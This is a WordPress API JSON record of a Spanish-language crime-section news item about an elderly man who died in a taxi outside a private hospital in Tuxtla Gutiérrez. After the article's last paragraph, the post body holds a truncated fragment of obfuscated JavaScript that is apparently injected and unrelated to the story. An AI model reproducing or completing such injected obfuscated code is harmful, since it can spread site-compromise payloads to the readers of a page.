{"id":24782,"date":"2025-10-25T03:21:58","date_gmt":"2025-10-25T03:21:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24782"},"modified":"2025-10-25T03:21:59","modified_gmt":"2025-10-25T03:21:59","slug":"fallece-hombre-afuera-de-hospital-particular-en-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24782","title":{"rendered":"Fallece hombre afuera de hospital particular en Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"24783\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399242-1024x576.jpg\" alt=\"\" class=\"wp-image-24783\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399242-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399242-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399242-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399242-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399242.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"24784\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399243-1024x576.jpg\" alt=\"\" class=\"wp-image-24784\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399243-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399243-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399243-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399243-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399243.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"24785\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399241-1024x576.jpg\" alt=\"\" class=\"wp-image-24785\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399241-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399241-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399241-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399241-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000399241.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 24 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Este viernes por la ma\u00f1ana un hombre falleci\u00f3 en el interior de un taxi afuera del Centro M\u00e9dico Arboledas ubicado en la 16 Poniente, entre Tercera y Cuarta Norte de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los primeros reportes, este hecho ocurri\u00f3 cuando un hombre originario del municipio de Bochil de unos 74 a\u00f1os de edad comenz\u00f3 a sentirse mal y decidieron trasladarlo a la capital chiapaneca para que recibiera ayuda m\u00e9dica.<\/p>\n\n\n\n<p>A bordo de un taxi lo trasladaron y al llegar al nosocomio particular ya hab\u00eda perdido la vida.<\/p>\n\n\n\n<p>Hasta el momento se desconoce las causas concretas del deceso sin embargo, se dijo que el adulto mayor padec\u00eda enfermedades cr\u00f3nico-degenerativas.<\/p>\n\n\n\n<p>Al lugar arribaron elementos polic\u00edacos para acordonar el \u00e1rea.<\/p>\n\n\n\n<p>Peritos de la Fiscal\u00eda General del Estado realizaron las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 24 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Este viernes por la ma\u00f1ana un hombre falleci\u00f3 en el interior de un taxi afuera del Centro M\u00e9dico Arboledas ubicado en la 16 Poniente, entre Tercera y Cuarta Norte de Tuxtla Guti\u00e9rrez. De acuerdo con los primeros reportes, este hecho ocurri\u00f3 cuando un hombre &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24785,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-24782","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24782","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24782"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24782\/revisions"}],"predecessor-version":[{"id":24786,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24782\/revisions\/24786"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24785"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24782"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24782"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24782"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}